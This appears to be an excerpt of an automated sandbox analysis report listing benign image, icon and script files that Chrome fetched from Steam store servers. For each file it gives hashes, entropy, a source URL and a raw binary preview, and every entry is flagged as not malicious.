        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:SVG Scalable Vector Graphics image
        Category:downloaded
        Size (bytes):5307
        Entropy (8bit):6.066768712612663
        Encrypted:false
        SSDEEP:96:AvfYtFKIMSxjU72WVBsmGLY0b/Ozwwz5PKIMSxjU72WVBpeIXIosJ:kYt0IOahh9b/OzwwzIIOaEej
        MD5:134BC626CEE2C5B8676648ADA9C51996
        SHA1:F746DA1B20CA9A4ECE15A203AD1C0DA9BAD78C69
        SHA-256:30084160092158D35CD82A46865222CCA9D2D3E9CF388382BDDC86292FF1F118
        SHA-512:BCCB9C642D5F343E38336D35B29584E8B87F28074279B34E33F2EA8E7CF43CDB46528EF5A2837F1A7459C0C7E045B1180919E8D0044218F115E724F47EE18810
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/images/icon_share_android.svg
        Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 24.2.3, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 16 16" style="enable-background:new 0 0 16 16;" xml:space="preserve">..<style type="text/css">....st0{display:none;}....st1{display:inline;}....st2{fill:#67C1F5;}..</style>..<g id="Layer_2" class="st0">.......<image style="display:inline;overflow:visible;" width="16" height="16" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ..bWFnZVJlYWR5ccllPAAAAyZpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdp..bj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6..eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTQ1IDc5LjE2..MzQ5OSwgMjAxOC8wOC8xMy0xNjo0MDoyMiAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJo..dHRwOi8vd3d3LnczLm9yZy8xOTk5LzA
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 306 x 260, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):168094
        Entropy (8bit):7.993323863853478
        Encrypted:true
        SSDEEP:3072:6Ts4YyO4yG0ppxkeLDCmLMR40v6vN//cD+qBc/4F6Rso6E/oiE1ey7Mp5HVN3qA9:osvyO4ybkeymwG0v6vNHcDY/ES5c8C2R
        MD5:6A08C3D149EEFEB19A0706B910683D86
        SHA1:722641AAB53281E1679CE4CAB96C1C368404CB24
        SHA-256:7D2F242A418563919C09A23CE121CF1CAC1C79C7F1920778CDA3DD0010C8E304
        SHA-512:4650A9B4627D33E7D0E8654F1F0A344126E710E5F4EC30799E9FEC42C0B31E4F7911F77980067BBF520E56FE214596D170CCC29593BDB873EE78A84082E33046
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/spotlights/0e699c53b0e0aeebcb145867/spotlight_image_english.png?t=1716485632
        Preview:.PNG........IHDR...2...........u....pHYs................PIDATx...g.m.y..>_...Su3....s.s.DYb..%RT.%[.m.,...5?..f..q.W....nI.-+p,[.(1....9.$..$.......N....}....9.....V.9...~...O....?I'.......B....9y.Zk<}...q..b.E]a.k..D...o.C.8Z.x.,.].......Far....k,..yn.....lv;().%|..1BK.m.......!.sXkq..3.Z....-.8.\@...Z..p...(...vm....Z*.vD].8.lPd9..1BI..5|..R.(...EU...\Y..k[.V8.ZA+..=..0Z#.<30Z.z.....H.B...A...j(%.C@..!..A?..J#.s..a....!D$..9h.!.Dn..,.f..`-.....P.H....z8.%..V.!@+.n.!.@]..1AH..#F.e..0@I...0X..<..%.......=2c......g.c`.. ..{.]....E.#...=6....Q.......y..Z.&..,.uPJ....!..T.....R8.Z!..u..s..vX6...Bn4.THH...B.E..*..w-B.0Jc.u(..MY!...5.<C..._,a.F.w.)!7...C..Zi......8.ZAJ..W. .24e.,.`....!F.}.........g9.u...!BH.-%z;......JJ@..u@JHH..=..%..h.~~^..0Z.y.<3.M...ux..z4U.a.!..)Q.9. ...Fk..@.....J...AJ....@..........C;......S.s.Y.!..?.]..(.!%...!.}.....B.....2..C...a.BU.p.c.......{.!Q...,.....w..;.-.P.9.\.....B...F..y....3.."."......H|....rt...V..JI...d8...m..,......,
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 71x71, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):44949
        Entropy (8bit):7.9626820576485615
        Encrypted:false
        SSDEEP:768:prJWpsPg5RoTlbF8XgoY7Ea0zF7EE+v97oih2MTxv:ZJJThbF8XgoY7Ea0JEdlkcFT5
        MD5:768065D12F96305EAC4D38371D278A9D
        SHA1:C69598DFA93508A41F3B64B3563808051CF90885
        SHA-256:FE42B4DCCE71BBDD00E72C2DD934DFEEDEF9E001A8EEAFF434A96B903665B900
        SHA-512:2DDD0F3E89DE52907256AD78C3029DBA032DD34D4C0A4823E354FC4EA44D997884DEF35CD30D650BDAA00AAFC58ECA755B72235DBFF8CFF031F3D5E5CB0F2606
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/236390/ss_367ad85e6d1c10b611a6f0360cdbae4cb29707fa.600x338.jpg
        Preview:......JFIF.....G.G.....C....................................................................C.......................................................................Q.X..".........................................M..........................!1A..Qa."q..2...#BR3..br....$4..%CD...5Sct...6FT.................................3........................!1A."2Q..aBq...#..3R..r..............?...WA...#5.G..3.D)F?....@.... .+.6j`.v.. ....N....q....-...7.q..j....o..Ku.8.7..7.S...-P....v.....]....H....R%.....jD.E!.j.,.d.T..K>.R.....N.K..*....H.=.2p*...P...*T1C.p"..C..Z..Q..q..b.D.j-..dG..v...jd1F"=L........z....Dz..{R....q.T.Q..Dj[.I.7..Doj9..dG.......oj.....F....Js.D...S7...j#.N...;.(.">jdF..Q..DzK.b..c.L.=..G...cr.:.]...M.*..P.h..#.I...C. m.Gs.KR.rh..~..Z..3.'..L...#w.G.RK[m.I.2...$....p./~JBq..i...g.]....<....1.@.;f..M....D.....$/.\..[...S.....'.-4...D.o%.N...5)..5.....pI..5$hv.kRc.J....M2.a6..R.:.t...(Ta.7&+.c.5...H..I....l./HzR...RH.....w|...D....SB:..(.\S38/s..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):279147
        Entropy (8bit):7.9832141068723885
        Encrypted:false
        SSDEEP:6144:kwbNLkbaBvCZmEWSYbGV71oXh5f3+bvv+xa5rfPN:kwbqeBvCfjYbGMXhdeHgGN
        MD5:BF7C91039E2BA70D1D426A2DD072FDAF
        SHA1:D7A78408D7129C72856A76C43C683EC9D4B8B6E1
        SHA-256:1ACD6DE4E9E468BD7D6AB02418FF06C0DAB69E502D594E8A9AE472E7334E2F04
        SHA-512:DAAE6A36D1FDA0F478EC34ED98E75D80D04F732C0F9638863E62D3AA3DA07A171F816F10D258AA12BD9D0D7909B69447BDC00A066E974E4D2597A2B8515CFA8A
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/pcgamer.png?t=1705420866
        Preview:.PNG........IHDR...X...........v....pHYs................)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2021-08-03T14:25:28+03:00" xmp:ModifyDate="2021-08-03T14:25:28+03:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:74c3181c-d104-574d-97a7-5b6eb75cbd13" xmpMM:DocumentID="adobe:docid:photoshop:0b4e304d-1886-5d4a-aab1-6aa2da455807" xmp
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1430
        Entropy (8bit):6.915444207165524
        Encrypted:false
        SSDEEP:24:2C1hkyaWwjx82lY2T3RVag7yJ3VR7GmXF54+mC8yq8/23CMwMIE+b8Dllc:HZNn2lpWJ3nnwDNmlPbUI
        MD5:AFC159FE5F0F26FA7282505DA9887CC3
        SHA1:C1CD55380C2AF435876989F94E8B0715042C2ADE
        SHA-256:4BE942A34871DD6F8F14B43D27C31B049BE7F6544C05685D4F35ABDD329DE176
        SHA-512:8F7DCB7E99CEED8F86575A05FF7D329EE2FC67CD18C6D53B2833A6AA1EEDE2586D57688F27901D941D2B6351412957468CCE5CA69101D86911390BF04FD82763
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...'iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.1 (Windows)" xmpMM:InstanceID="xmp.iid:6E745BD792D411EE8F80E4F5B5148EC9" xmpMM:DocumentID="xmp.did:6E745BD892D411EE8F80E4F5B5148EC9"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6E745BD592D411EE8F80E4F5B5148EC9" stRef:documentID="xmp.did:6E745BD692D411EE8F80E4F5B5148EC9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>{KL.....IDATx.b..U.d``.......@...4.....0.4.9...[`...e.5U...6V..G..d.....I2.].......?y.............^./....&.....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
        Category:dropped
        Size (bytes):38554
        Entropy (8bit):7.281917544628079
        Encrypted:false
        SSDEEP:768:PcaDYrV5KBau+3erpKn9jpe7z9mWAFjQcR4D9DQ0LKfjLh:PcsiV5Y+erc9T/H4f0jLh
        MD5:231913FDEBABCBE65F4B0052372BDE56
        SHA1:553909D080E4F210B64DC73292F3A111D5A0781F
        SHA-256:9F890A9DEBCDFCCC339149A7943BE9AFF9E4C9203C2FA37D5671A5B2C88503AD
        SHA-512:7B11B709968C5A52B9B60189FB534F5DF56912417243820E9D1C00C97F4BD6D0835F2CDF574D0C36ECB32DBBF5FC397324DF54F7FDF9E1B062B5DBDA2C02E919
        Malicious:false
        Reputation:low
        Preview:............ .h...V......... ......... .... .....F...00.... ..%............ ..R...D..(....... ..... ..................................u...t...w.H.z...|..}...}...|..z...w.I.t...u...........p...f...e...j...k..k...l...m...n...n...n...m..j...e...f...q...Z...Y...]..._...w6...T..{;..`..._..._..._..._..._...]...Y...Z..~K...P...O...{I............P..R...S...S...S...S...S...R..~K..t@.I.Q!.{T.....................M..zF..{H..{H..{H..{H..zG..yE.I..................................zJ$.m9..o;..o<..p<..p<..o;.........................................eM.p@$.c0..d0..d1..d1..............xP<.g9#..hW..........................~o.],..Z(..Z)...j].a7$.P ..O...P ..O.....v..........................dV.O...Q"..F...H...I...I...I...H...Q&...........................H...I...C...C...C...C...C...C...@....rg.......................C...C...?..I>...>...>...>...>...=...Y:*.....................x^Q.<...?..I=...:...:...:...:...:...:...9...mUG.............ti.=...:...=...7...7...6...6...6...6...6...6...4...@%..R:
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):8276
        Entropy (8bit):7.936447857784797
        Encrypted:false
        SSDEEP:192:Ay/CZFhYBljjgZ/5OmWVVr36umhUS7CfK2juUWVy6X9z:A9FhGCYmmRS2LOy6X9z
        MD5:E0FC9725FA33C8180D5693333EDEA8DB
        SHA1:2E55132C18E00A8A274B378CB3460D96BFE674AE
        SHA-256:2060DFA4F83022911E811A035515289ED51AB1CD0BB1CFE072310BF46D2FE54D
        SHA-512:E4EEEEB398A8FFD81BDE518991EE7457A3D75CA8ADB29FC811D19D0D77D01461171B5A3A2D09185264EE95ADFEF4C2E52F4F0B7AD313BAA588E368C468C8495D
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E.............................................<.........................!.1.."AQa.#2q...B..$3R.....Cbcr..................................4......................!..1.A.Qaq."2.#B.........R..............?..:B....5....VH.E.{..j\qJ..k.....~..I=...f...r......F.HjJ0u.w.D....`8..:.r...J.q.vW...6..S40C..K/.H.....=....3...f.+^.`.h.YSl_.[...9.c.MG.`?X...4.m?e..d.8RI..W..Qv....|.S..to........}.'.lz.....A...mIS.P.E5.W.I)oTM.r.......6...<.[.^....\A....a.....r.....5(\c=]Y....u....}...{..R..xc.mE.b......\.i.....#a.' ..g'#..z....Z.G&.~.C.....O..X|,..%.k....E.....`......h.8}.LF.....X...o..$t....*.....I..?.}.Mk..?eU^,.V..i+if......F....H.q.\...M%.(=E...r~.K..`9..P.MR)....5-.$a9.jGL........wZ....<..J..i......J........j...d.I>.?.U...TS.......U.R.C.....st.K#G.Wp...V.B./.R.U=D..~ ...../..X........S.Xvo...".
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 71x71, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):62374
        Entropy (8bit):7.978881649510389
        Encrypted:false
        SSDEEP:1536:suNAg5F/Nz+IBQQ92vA2K/m3XxsaYPcJtjbDw2RTRxQN5tR:FAg5F/N1BQ8Z/LBOtcMdaTtR
        MD5:7A407EA18400B7E0945AD8843D96B3FD
        SHA1:F759FC77E01050AD55AFD2466EE358AF2D3B1FE0
        SHA-256:BAC1DA638C45E6A51A1564E374798E5F21496D96B23877407C77EFBCBD81F6FC
        SHA-512:C8875B2515B45AD279F978194D6DF4E92C19C8A6CE0E55955F427F5662F267B372731B9F4AFEE3F84CFCEBD1FE27052781A411E293723733DDCF40F652420EC9
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/236390/ss_9568df089685277e726640a8d79cdc4aede97f43.600x338.jpg
        Preview:......JFIF.....G.G.....C....................................................................C.......................................................................Q.X..".........................................T.........................!.1.AQa."q.2.....#B.R.$35rst.....46Cb...7u.......%DcETv..................................;.......................!1.A."Q.2aq.......3..4B.#Rr..$CS.b............?..v[D.q..^D.L.b).=.x'.?Z.......9ct.R..c.V\.nf2..7....]B.N.t.........Vm5iX..J.8........<GU.. U.K_....-.....9...].5.a$l.@.......7."..#60..mW....(.Qx.M......+L..W.D...S..6+&.. ..qB.....11C......4.<.Ax.AF..[..."..[.]:6.....{S.Mf.]:$(4.+.z...D.....R.XR..4.PsPL....#.Gnd`.7..)r[.'..5]{..j.0...zS.F;R6{..FV.7.zV.9...b..Tj...*t&+{}..N..........T\...+ap)j..........B..=..F.{....i.\^...Z..=..".(z...<7.U....S.}k..........S....'.R..........p.....h...*.L...!#.v=...1..U.....-.FEge.UvM.....}.l%&.n%\...Q...e...c`.....J.. ..m^n#...z)9....I.@S.{..GO.Y....!k.[[.."..".q.C....,'K..;..eOP[
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (64904), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):171820
        Entropy (8bit):5.091592907461997
        Encrypted:false
        SSDEEP:1536:js4PKffp9FVf2HBeZTjxI1slCWW9sEbsgsfRc117tUCqU3A8yWiSgzgPMNSrf:js4PKfx/VhTjHlCNOEArfKrxRJS+D
        MD5:BD3FBFE0A71FC9C9925BD611F823A1E4
        SHA1:C5E1A3DDB20C8FB894E069310BDF05DC655F2FA6
        SHA-256:69ADB0AF90853345093AFAD207BA98622F7D2FCC9AE1365D1C89B267F7F10D4D
        SHA-512:6E279402479886777224CB092AEE8B76D917DA3D50C255E5689AE71BC338F97ED7E32A9A0F8A9F9B2DF04416A008E257BB7045C3428C10416B8B48834784504F
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/applications/store/sales_english-json.js?contenthash=2427041da1c36f76f959
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[7952],{12445:e=>{e.exports=JSON.parse('{"language":"english","Summer2022_hunt_Intro":"Greetings from the Future!","Summer2022_hunt_Intro_1":"I am Clorthax, a time-traveling trickster! I know what you.re thinking: \\"A professional trickster? This sounds like a trick!\\" That is a reasonable concern! But what I am about to tell you is not a trick, and to prove it, I will type it in all caps: THIS IS NOT A TRICK.","Summer2022_hunt_Intro_2":"Okay, it.s a trick. But only on the people of the future! You.re going to love this. Why? Because I have stolen the ten best games from the far future, then traveled across an ocean of time to sell them to you! Exclusively on Steam!","Summer2022_hunt_Intro_3":"Anyway, I can.t outright tell you the names of thes
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):55848
        Entropy (8bit):7.9743413752575005
        Encrypted:false
        SSDEEP:1536:B7A0QzWXpdomtgHcauX7hMKHiqpoIDk5xmdrML52Pli:B7kap3KL27piqjDk5xiE2M
        MD5:BD18C87EE0425F191A892168116391BD
        SHA1:E108FCB07483A90942A7C2E6B0B4C26D01B2C0E5
        SHA-256:BD2A1966909C391756D36142A8CD9B3DA25A193588CA0E31E39F24BF0D2AF0EF
        SHA-512:B65729C05B7F66246845FBACA22213AEE9C8A7FA1CA39D22C227D9EE39C71B374AD8E0C02F924EDE900912E4E9EBC5FF8922A5C2988DDF6BAFF9D79E2BDE29D7
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1245620/ss_828169fcebebe98bee822bd88ae81b410068a2ba.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................E........................!1.A."Qa.q..2B...#R.....3.br...$C.4S.D.....................................3......................!.1A.Qa.".q..2.....#..B.3CR............?...#..q.L.&.(..^=)..#.......a.....1R.&.S>...z...5..m.E..T.F.S.:Y..."........&m.$A.Q.W..M.4..t..k!=.5J\AEH..u[w_3...eB./..z.*..4..P.{....w}N{...........h.Q.G....z..h^F..$....*.yJ......I...!.H......kF.$S.sw,.48.PKl...Z...S...S.q.....O...r(...>..h.0.E.NC.Y]<...qIF..9.fo...H_........x..a.I.oY../r.V(....V...=!.f...1.Z..?.....'...9....}.v..C...J.>l.... =.w...."J....DYgc.P60s.mXKF...h.F5...(.U.....a.I.....N.3.....4.;.XF..<.>......ZC...'r...yw.4........>D.../7..vG..c..O.q$.....XP_.a.7.L..h...o...=".9oV=Z...}9.g6.l..2m#..@....K.?..I.....|.......A..3...yc.. .V.6...i&U].p.s.An~.+..Hp@..?Q.....E.J.}3..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 92 x 26, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1846
        Entropy (8bit):7.365755828390777
        Encrypted:false
        SSDEEP:24:o/51he91Wwh82lYSg767V+6gT3qxyJbRW6vRW6nGPAQ4PKsSnflj0Sybz4+43Ore:o/qQvnb6706gVJbVvVnX/8NAzb/4OFjg
        MD5:574C350C7B23AE794D5276F8580E0838
        SHA1:235C7B35C3468F8915ECA01F7ABDB43D34079609
        SHA-256:8B97BA0DAC22FE6704C1F6D95FE79613F33017804F256ABB9006DF0442491787
        SHA-512:F1F2D7B6FA49E9241F2B88560127EB2871F66123C2F9DE45B257750CF13E6EBB32A9D85D87AADA6A99838A2F3C5412540065CBAB398760A50F15AAE3A759F9F7
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
        Preview:.PNG........IHDR...\.........:.;)....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:CA2980EA1CE911E48001B5E88DFE2FC8" xmpMM:InstanceID="xmp.iid:CA2980E91CE911E48001B5E88DFE2FC8" xmp:CreatorTool="Adobe Photoshop CS6 Windows"> <xmpMM:DerivedFrom stRef:instanceID="022AC118D7972AA30ADDF82E49682075" stRef:documentID="022AC118D7972AA30ADDF82E49682075"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..X[H.Q...7.-.a.E.0.(."....-..z.GIA.O.}..Q.._EQP..(.0{.(z@.......Y.......v..;g.3.Y...93.Y..>{.......02..~b.X....g2..h.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 616x353, components 3
        Category:downloaded
        Size (bytes):64237
        Entropy (8bit):7.951636807269081
        Encrypted:false
        SSDEEP:768:ekmOsLYOyjI/Gn2+Bthjt1xvYVzmgwDxaHUWQ+XDOYyO+BcQgcK42MoIDBcf6C2o:FsHynfLZizmgw34O3cC95DB26Ca4
        MD5:C96FCF0CDBF68806A49770174811F320
        SHA1:0BCD897ADEF4B4A45A4EC91F8F37495C79CEFA18
        SHA-256:47F02AC4DC3E55FA3F916F05DCEBB0E748EBB73AB459F3ABD22537E1E2B22C2F
        SHA-512:64EF7A8805ECD4AD40B82E8A2460E286AB8FFA80B063764D9411DE51D4D41289D65438A6721B2580F5CA9A98FDC27FBB93B53795F82C877DE21E8FEF0481A181
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/730/capsule_616x353.jpg?t=1716504320
        Preview:......JFIF.............C....................................................................C.......................................................................a.h............................................b..........................!1.AQ..."aq.2....B........#RU...$3Wbr..&4Vs....CSTu...68...%'57Dct....................................J........................!1A....Qq...."Sa......2..$BR#TUbr.%34...&5...Ccs............?...a.]X..b.B.K...x..{8S..Wy.X<.......+-.<...b.qC/......<..rK.f..]1..................W...^I...8rp...%...\.s.9..p........... .k... ..J_D7D..>..._7N...0...0....T....... ..p.B..o.}....%k...d.'3.!..w.........HH$..S.E.BiR..\.o.....5...@..J}7...ja....Uk....j..'t..d.i..i..Q......>..|.50.L...*....~.@..)92[4.....H.Q....\..y..sS.$..j..Ze...#.N.I.J. ....-S'.:C.....&A.]...U...I...wU...LJ. .,..'zw..g.|.`..N]...K.T..0...a2..Y.w......UUJ...S=b\.(3..h..I=.Bs.89..-Y:p.I.A]..y....x-..Fp8..*.w'&O .....g..c.....==.b.#.|..8,,0..U....dh.v...^%..js....w..IK@..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):80072
        Entropy (8bit):7.973507439340328
        Encrypted:false
        SSDEEP:1536:Prhd7/7Y/iqT5DhWeBRZI9Phi19RXsI+QrfLGhSYCGK2nb8HVgBzol6b62:9qT5VWeBHkA19J5r7YzT8HWVoE
        MD5:03C0F2F494964592ABBA6929095D4091
        SHA1:EE8A081FE74466C37E520BBCD162E2C772AF8BA2
        SHA-256:5D0B1230197060E5AA942AF0A089CA7E747964589823B630AF7F868EEBE1F6F7
        SHA-512:ED66B0F30B8AE2404DEA62FAF8316279B2F76242DBA42664ED50AE1CCCE595A2C72EAB1915617DA4686937374FA3ABEDBB5736DC099367839ED6D22308730EE1
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................M.........................!.1.AQ.."aq.2...#B...Rr..$34b...Cs...5..%6Dt..Sc..................................9........................!1A."Q.2a.q#B...3...R..C..$b...............?.b...K..lk...!h..5......!zul.{......8......A..!..=5.D..O].!......B...@.GHq...q.8.....v}5().....Nq....E*r..........g':.Ey@..~..".g.R./.......<j..v5.z..K?4.h..R.}.V...O.D*.*.A....D=.q.!..9.:t#!eQ.w...N5.....=.@0H.%.. 7.R.d.'.B.J.n...1..u.y<.H..;.v'.j...7.....c$..uk.]).7/'"$<.. s.A.|...[<..r|....Q...&.......B.p..q.F..D.5.>.. ....!..RO.R<m..F$d...Q.c.E......-.0%9N.E...Y+K8.4HW.$..q...4~....r...!.....z...\......F<K....ItYE....V.|....d....-..Gn5.4.-....w.KE.:W.m....%a...0.l~.........G1.Y~!....rO...u7p.....o.7.[|.$fw_.'..f..C...3E.z.......Xa..DC...../..ts?u..O..{..._..;......V....nvD
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 1390 x 193, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):28761
        Entropy (8bit):7.956794711428168
        Encrypted:false
        SSDEEP:768:bodkz+z4HbKXqgAU7wuf8B/Ae12VG/upRxXfs7+l71Dy:bEkvHbFxuZde12VC+RBy
        MD5:87B2AB4415E46243280A14E3E1314DF1
        SHA1:2B10D735062A20209E18AA684F694A9CDF03078D
        SHA-256:74F45C566B9F41FEC717033D6D420EAF6E91F61D9DADDE5B1A6220D2E86732D0
        SHA-512:CFFC250B0003D94E9D7783149B3D23810ECBBEF351D0279BBF16ED57CFF843B92FC6144DEDD1711CDA3AE578DA6410F2BC8CEEE67C7980A522B9DF4CF8F30DD5
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...n........._F).....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:7A252E10210811E5A820F2520D688752" xmpMM:DocumentID="xmp.did:7A252E11210811E5A820F2520D688752"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7A252E0E210811E5A820F2520D688752" stRef:documentID="xmp.did:7A252E0F210811E5A820F2520D688752"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>"..w..l.IDATx..}k...q...<j.5.GO..n...}.Y.y....'s/...$[a..3...........TYT..p.{rO..r^.>.4-..-?.m......sl?{....?q..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 52 x 32, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):3337
        Entropy (8bit):7.892760651819877
        Encrypted:false
        SSDEEP:96:KSDZ/I09Da01l+gmkyTt6Hk8nToHyr0Ds:KSDS0tKg9E05TYQ
        MD5:CA87E695F53CD686A507EB1E356C2A3D
        SHA1:190F4E4D353612A7751F03ADB7D977A12BDDF9A6
        SHA-256:58A1BA330EBDE58FA377C56C13E1DC15EAEA26297BE56646AB67E647968F04A5
        SHA-512:293F1F514F3794815E9F73520A122778628524E5BAC53DB5D2D3C932BD9985BA4BCEECD0D4ABFB521EB7D7629447FBF8C48B931F997E66DBF8977FB0419452A0
        Malicious:false
        Reputation:low
